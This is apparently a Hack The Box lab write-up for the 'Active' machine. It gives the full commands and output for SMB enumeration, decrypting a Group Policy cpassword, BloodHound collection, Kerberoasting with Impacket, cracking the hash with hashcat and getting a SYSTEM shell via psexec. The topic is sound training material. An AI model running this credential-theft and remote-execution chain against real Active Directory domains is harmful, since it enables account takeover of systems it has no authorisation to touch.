HTB - Active

Getting Root:

Used smbmap to enumerate smb and found a Group Policy config file with encrypted creds.
Decrypted the password using gpp-decrypt
Used bloodhound to enumerate the DC
Found the Administrator user was kerberostable

Nmap

# Nmap 7.80 scan initiated Sat Mar  7 16:31:24 2020 as: 
nmap -Pn -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 -oN nmap/Active_nmap.txt 10.10.10.100                                                                                                                                                         
Nmap scan report for 10.10.10.100                                                                                                                                                             
Host is up (0.085s latency).                                                                                                                                                                  
                                                                                                                                                                                              
PORT      STATE SERVICE       VERSION                                                                                                                                                         
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)                                                                                                  
| dns-nsid:                                                                                                                                                                                   
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)                                                                                                                                           
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-07 21:33:51Z)                                                                                                  
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                                           
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                   
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)                                                                     
445/tcp   open  microsoft-ds?                                                                                                                                                                 
464/tcp   open  kpasswd5?                                                                                                                                                                     
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                                             
636/tcp   open  tcpwrapped                                                                                                                                                                    
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)                                                                     
3269/tcp  open  tcpwrapped                                                                                                                                                                    
5722/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                                           
9389/tcp  open  mc-nmf        .NET Message Framing                                                                                                                                            
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                         
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_http-title: Not Found                                                                                                                                                                       
49152/tcp open  msrpc         Microsoft Windows RPC                                                                                                                                           
49153/tcp open  msrpc         Microsoft Windows RPC                                                                                                                                           
49154/tcp open  msrpc         Microsoft Windows RPC                                                                                                                                           
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m18s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-07T21:34:47
|_  start_date: 2020-03-07T21:19:38

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  7 16:34:35 2020 -- 1 IP address (1 host up) scanned in 190.90 seconds

# Nmap 7.80 scan initiated Sat Mar  7 16:34:35 2020 as: 
nmap -Pn -sU -oN nmap/Active.udp 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.038s latency).
Not shown: 971 closed ports
PORT      STATE         SERVICE
53/udp    open          domain
88/udp    open|filtered kerberos-sec
123/udp   open          ntp
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
389/udp   open|filtered ldap
464/udp   open|filtered kpasswd5
500/udp   open|filtered isakmp
2048/udp  open|filtered dls-monitor
4500/udp  open|filtered nat-t-ike
5355/udp  open|filtered llmnr
17573/udp open|filtered unknown
28641/udp open|filtered unknown
48761/udp open|filtered unknown
49205/udp open|filtered unknown
51554/udp open|filtered unknown
51586/udp open          unknown
51690/udp open          unknown
51717/udp open          unknown
51905/udp open          unknown
51972/udp open|filtered unknown
52144/udp open          unknown
52225/udp open|filtered unknown
52503/udp open          unknown
53006/udp open|filtered unknown
53037/udp open|filtered unknown
53571/udp open          unknown
53589/udp open          unknown
53838/udp open          unknown

Enumerating SMB

Looks like we can read the Replication share

# smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share   
        Users                                                   NO ACCESS

Recursively listing all files using smbmap

smbmap -H 10.10.10.100 -R Replication --depth 10

# The followinf file is interesting since this usually contains Group Policy creds
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\*  
        dr--r--r--                0 Sat Jul 21 06:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 06:37:44 2018    ..
        fr--r--r--              533 Sat Jul 21 06:38:11 2018    Groups.xml

Downloading the file using smbmap

smbmap -H 10.10.10.100 -R Replication --depth 10 -A Groups.xml
[+] IP: 10.10.10.100:445        Name: active.htb                                        
[+] Starting search for files matching 'Groups.xml' on share Replication.
[+] Match found! Downloading: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

Contents of the Groups.xml file

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Decrypting the Group Policy Password using gpp-decrypt

gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

Attempting to access the box using those creds failed using psexec because the user can not write to any share. However the credentials are confirmed to be valid using smbmap and crackmapexec.

BloodHound

Getting Bloodhound

GitHub - dirkjanm/BloodHound.py: A Python based ingestor for BloodHoundGitHub

Collecting the Data

./bloodhound.py -d ACTIVE.HTB -u SVC_TGS -p GPPstillStandingStrong2k18 -dc 10.10.10.100 -ns 10.10.10.100 -c All

Graphing the Data

# neo4j start
# bloodhound

Shortest Paths from Kerberoastable Users

The above query results show that the user Administrator is Kerberoastable

Using Impacket-GetUserSPNs.py

/opt/impacket/examples/GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -request -dc-ip 10.10.10.100
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520             


$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$31fd0262c8c6885bb329b33dd932fdd9$0f43cac485bc0ff979f14e93cc6f7bc4d62e1537cffd190d81c8f7f3255c9780bf27a9ea2ae71c5201f476e9b86dcc35b194c9b827ac55140f3dfca465b33f01bdf6e98cf01cb9cf381af698c2e4c191d5bf5193d3f0155e2280e6d667fb02ea44a6bc786d685e6523082cf40ede148f4d46d327b6c1fb4f55d3f4f4147a83aaf4e36187b022e4652de88421273ceb082c97d3b34f8a0c4613ea66e8dc009d24859ae13f083251a49f2bb49ec292a86375651c0b9afe93ee9c64274d9c218274807dfc7c414efe9989bb20a3ace0cf7d88db63b72f5069470e90e05d4e5840c87a6cd34772d5a94b8820596a74513d4546d7d83a858dc96602bacb0ee8649304a43d8d3cf314ccbb9d5fe2fcdec2477a04de5252ae3a68f8607f0d374ab83bde264e00df4f7d8c30b207013c9efe0180f5c74af1b57e039f489dce46d79617035dae54d92dce7d7d6566c6d210f7703136e7bc4f59b306ef1e0a0ff8a495cb44e447d7fdebb4f21153ade1a4d5a6d36facafdf638d4f8ef864e2892db6fcdd168764827f566c21dc3159646e0c20b414cccbea7a65ae8357a76277ba7d10a783d4afa4d035744c513c326e2e829e8d97b778d883581650425cb77758ef20be18e4ac1e37b74d4f0a6b3d3e9b083ec6db77a23452fe34d4c7b26b99e2637909ea2ca7c61c154c336dd08c0a91341a5768cdfb84cab66c68a92c6407a9d924582690cd9c072edb05c37a3f27832864685e502ef78d8d87272077071e3734feaff892e9294bf0b1efb23f02f10e52d57bf11924b6014f67f177644e0c9da734b440e8c5d74c03ec139cd39de0bb11038cb12e8698652075cd11d36942f3ae8738a07a3808e9da515b94c2cf06bd0811392001808b26323619d54360a21e984f44b366cf5c44740e5b51b8471aa1f76c94281c9df2697a943f938430815567639404c0fcfb66fa5dd2fb0f2642c042caad24a6853d2533985e44f0e74bae84b3d45074d008d0d9070d4bd9ca7c36c9371c805f39d9f3ec1232a98be2d3bc59d58f28c6834c25f8dc809ecea255b3b06a9fa57b58e74dd2145e889f948d6a5196b58f093620b3891ce1687724245c9e652115095d4655df119619becf7216086eb096ff8bcaf53e1672b29b1916d6957d7b041eae2963658a10d9fa36273df0bf8802644cc862ec33a4a4b21eb753bb1649cd5d7592438dfeca872d9cdcbbbae9c4ba1854443db9f0f000f47afa55bf00c502c3e6e8a2edd0aeb6783e

Cracking the Hash

I use a windows box with nice GPUs to crack hashcat... It's way faster than using the Kali VM

# hashcat -m 13100 admin.hash rockyou.txt

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$31fd0262c8c6885bb329b33dd932fdd9$0f43cac485bc0ff979f14e93cc6f7bc4d62e1537cffd190d81c8f7f3255c9780bf27a9ea2ae71c5201f476e9b86dcc35b194c9b827ac55140f3dfca465b33f01bdf6e98cf01cb9cf381af698c2e4c191d5bf5193d3f0155e2280e6d667fb02ea44a6bc786d685e6523082cf40ede148f4d46d327b6c1fb4f55d3f4f4147a83aaf4e36187b022e4652de88421273ceb082c97d3b34f8a0c4613ea66e8dc009d24859ae13f083251a49f2bb49ec292a86375651c0b9afe93ee9c64274d9c218274807dfc7c414efe9989bb20a3ace0cf7d88db63b72f5069470e90e05d4e5840c87a6cd34772d5a94b8820596a74513d4546d7d83a858dc96602bacb0ee8649304a43d8d3cf314ccbb9d5fe2fcdec2477a04de5252ae3a68f8607f0d374ab83bde264e00df4f7d8c30b207013c9efe0180f5c74af1b57e039f489dce46d79617035dae54d92dce7d7d6566c6d210f7703136e7bc4f59b306ef1e0a0ff8a495cb44e447d7fdebb4f21153ade1a4d5a6d36facafdf638d4f8ef864e2892db6fcdd168764827f566c21dc3159646e0c20b414cccbea7a65ae8357a76277ba7d10a783d4afa4d035744c513c326e2e829e8d97b778d883581650425cb77758ef20be18e4ac1e37b74d4f0a6b3d3e9b083ec6db77a23452fe34d4c7b26b99e2637909ea2ca7c61c154c336dd08c0a91341a5768cdfb84cab66c68a92c6407a9d924582690cd9c072edb05c37a3f27832864685e502ef78d8d87272077071e3734feaff892e9294bf0b1efb23f02f10e52d57bf11924b6014f67f177644e0c9da734b440e8c5d74c03ec139cd39de0bb11038cb12e8698652075cd11d36942f3ae8738a07a3808e9da515b94c2cf06bd0811392001808b26323619d54360a21e984f44b366cf5c44740e5b51b8471aa1f76c94281c9df2697a943f938430815567639404c0fcfb66fa5dd2fb0f2642c042caad24a6853d2533985e44f0e74bae84b3d45074d008d0d9070d4bd9ca7c36c9371c805f39d9f3ec1232a98be2d3bc59d58f28c6834c25f8dc809ecea255b3b06a9fa57b58e74dd2145e889f948d6a5196b58f093620b3891ce1687724245c9e652115095d4655df119619becf7216086eb096ff8bcaf53e1672b29b1916d6957d7b041eae2963658a10d9fa36273df0bf8802644cc862ec33a4a4b21eb753bb1649cd5d7592438dfeca872d9cdcbbbae9c4ba1854443db9f0f000f47afa55bf00c502c3e6e8a2edd0aeb6783e

#Password
Ticketmaster1968  

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...b6783e
Time.Started.....: Sun Mar 08 01:32:02 2020 (2 secs)
Time.Estimated...: Sun Mar 08 01:32:04 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  6493.5 kH/s (5.50ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10616832/14344385 (74.01%)
Rejected.........: 0/10616832 (0.00%)
Restore.Point....: 10223616/14344385 (71.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alisonodonnell1 -> Saboka54
Hardware.Mon.#1..: Temp: 57c Util: 33% Core:1860MHz Mem:6000MHz Bus:16

Root Flag

psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100 
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation   

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file rshcyaJN.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service plcS on 10.10.10.100.....
[*] Starting service plcS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Tunnel adapter isatap.{B3FEC2C7-47CA-4014-A441-A3A5CDDC983C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

PreviousHTB - Heist NextHTB - Bastion

Last updated 5 years ago